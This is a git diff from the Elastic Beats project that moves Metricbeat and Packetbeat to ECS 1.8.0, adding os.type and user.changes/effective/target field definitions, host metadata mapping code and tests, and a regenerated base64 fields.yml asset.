- name: user_agent title: User agent group: 2 @@ -5580,6 +5867,21 @@ ignore_above: 1024 description: Operating system platform (such centos, ubuntu, windows). example: darwin + - name: os.type + level: extended + type: keyword + ignore_above: 1024 + description: 'Use the `os.type` field to categorize the operating system into + one of the broad commercial families. + + One of these following values should be used (lowercase): linux, macos, unix, + windows. + + If the OS you''re dealing with is not in the list, the field should not be + populated. Please let us know by opening an issue with ECS, to propose its + addition.' + example: macos + default_field: false - name: os.version level: extended type: keyword diff --git a/libbeat/metric/system/host/host.go b/libbeat/metric/system/host/host.go index 0d143ed2499e..6f5c9c15849a 100644 --- a/libbeat/metric/system/host/host.go +++ b/libbeat/metric/system/host/host.go @@ -53,7 +53,9 @@ func MapHostInfo(info types.HostInfo) common.MapStr { if info.OS.Build != "" { data.Put("host.os.build", info.OS.Build) } - + if info.OS.Type != "" { + data.Put("host.os.type", info.OS.Type) + } return data } diff --git a/libbeat/processors/add_host_metadata/add_host_metadata_test.go b/libbeat/processors/add_host_metadata/add_host_metadata_test.go index c41c76966351..6120269395c4 100644 --- a/libbeat/processors/add_host_metadata/add_host_metadata_test.go +++ b/libbeat/processors/add_host_metadata/add_host_metadata_test.go @@ -75,6 +75,10 @@ func TestConfigDefault(t *testing.T) { v, err = newEvent.GetValue("host.mac") assert.NoError(t, err) assert.NotNil(t, v) + + v, err = newEvent.GetValue("host.os.type") + assert.NoError(t, err) + assert.NotNil(t, v) } func TestConfigNetInfoDisabled(t *testing.T) { @@ -118,6 +122,10 @@ func TestConfigNetInfoDisabled(t *testing.T) { v, err = newEvent.GetValue("host.mac") assert.Error(t, err) assert.Nil(t, v) + + v, err = newEvent.GetValue("host.os.type") + assert.NoError(t, err) + assert.NotNil(t, v) } func TestConfigName(t *testing.T) { diff --git a/libbeat/processors/add_host_metadata/docs/add_host_metadata.asciidoc b/libbeat/processors/add_host_metadata/docs/add_host_metadata.asciidoc index 21d308b23c1d..c2a3b52994ec 100644 --- a/libbeat/processors/add_host_metadata/docs/add_host_metadata.asciidoc +++ b/libbeat/processors/add_host_metadata/docs/add_host_metadata.asciidoc @@ -57,6 +57,7 @@ The fields added to the event look like the following: "id":"", "os":{ "family":"darwin", + "type":"macos", "build":"16G1212", "platform":"darwin", "version":"10.12.6", diff --git a/metricbeat/cmd/root.go b/metricbeat/cmd/root.go index 2681a2a381d6..8da887270bbc 100644 --- a/metricbeat/cmd/root.go +++ b/metricbeat/cmd/root.go @@ -43,7 +43,7 @@ const ( Name = "metricbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // RootCmd to handle beats cli diff --git a/metricbeat/docs/fields.asciidoc b/metricbeat/docs/fields.asciidoc index d67075d4adc8..96dff72d890d 100644 --- a/metricbeat/docs/fields.asciidoc +++ b/metricbeat/docs/fields.asciidoc @@ -11734,7 +11734,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -11787,7 +11787,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -12978,6 +12978,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -14052,6 +14065,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -14222,6 +14248,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -17373,6 +17412,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -17548,6 +17588,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -17558,6 +17711,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -17661,6 +17927,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -17777,6 +18156,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/packetbeat/cmd/root.go b/packetbeat/cmd/root.go index f05e2bb9d367..e2fbb373d2f0 100644 --- a/packetbeat/cmd/root.go +++ b/packetbeat/cmd/root.go @@ -37,7 +37,7 @@ const ( Name = "packetbeat" // ecsVersion specifies the version of ECS that Packetbeat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/packetbeat/docs/fields.asciidoc b/packetbeat/docs/fields.asciidoc index d024fa12917b..3475f2c6e91e 100644 --- a/packetbeat/docs/fields.asciidoc +++ b/packetbeat/docs/fields.asciidoc @@ -3952,7 +3952,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -4005,7 +4005,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -5196,6 +5196,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -6270,6 +6283,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -6440,6 +6466,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -9591,6 +9630,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -9766,6 +9806,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -9776,6 +9929,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -9879,6 +10145,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -9995,6 +10374,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/packetbeat/include/fields.go b/packetbeat/include/fields.go index 1f2b1015f554..323eff798ee7 100644 --- a/packetbeat/include/fields.go +++ b/packetbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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